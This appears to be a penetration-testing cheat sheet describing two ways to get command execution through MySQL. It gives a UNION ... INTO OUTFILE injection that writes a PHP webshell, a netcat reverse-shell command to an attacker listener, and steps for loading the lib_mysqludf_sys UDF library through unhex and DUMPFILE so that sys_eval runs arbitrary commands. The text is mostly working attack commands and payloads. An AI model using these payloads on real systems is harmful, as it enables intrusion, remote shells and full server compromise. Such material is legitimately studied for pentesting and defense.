Webshell and UDF

Method 1: Webshell

If we have write permission, we can use UNION attack and INTO OUTFILE to create a PHP webshell on the target system:

SELECT username,password FROM users WHERE id = '1' UNION SELECT 1,'<?php system($_GET["cmd"]);?>' INTO OUTFILE '/var/www/html/images/webshell.php';

Here we choose the images directory since it is usually owned by the www-data user, not root.

Once the webshell is created successfully, we can spawn a netcat reverse shell. Start a listener on our local machine:

nc -nvlp 443

Spawn a netcat reverse shell using the webshell:

http://127.0.0.1/images/webshell.php?cmd=nc -e /bin/bash <local_ip> 443

Method 2: UDF

There is a plugin lib_mysqludf_sys which contains the following dangerous functions:

• sys_eval(): executes any command and returns the result

• sys_exec(): executes any command and returns the return code

• sys_get(): gets an environment variable

• sys_set(): creates or modifies an environment variable

MySQL does not have this lib by default. In order to use these functions, we have to import lib_mysqludf_sys first. Generate a binary version of this lib using sqlmap cloak.py:

cd sqlmap/extra/cloak
python3 cloak.py -d -i ../../data/udf/mysql/linux/32/lib_mysqludf_sys.so_ -o lib_mysqludf_sys.so

Grab its content as hex:

xxd -ps lib_mysqludf_sys.so

Connect to MySQL. In the MySQL shell, copy and paste the hex data and unhex() it:

SELECT unhex('<hex_data_in_lib_linux.so>') INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so

Here we use DUMPFILE instead OUTFILE since DUMPFILE outputs a unmodified binary file while OUTFILE adds newlines and escapes some special characters.

Exports the sys_eval() function from lib_mysqludf_sys.so:

CREATE FUNCTION sys_eval returns string soname "lib_mysqludf_sys.so"

At this stage we can execute any command using the sys_eval() function:

SELECT sys_eval('id');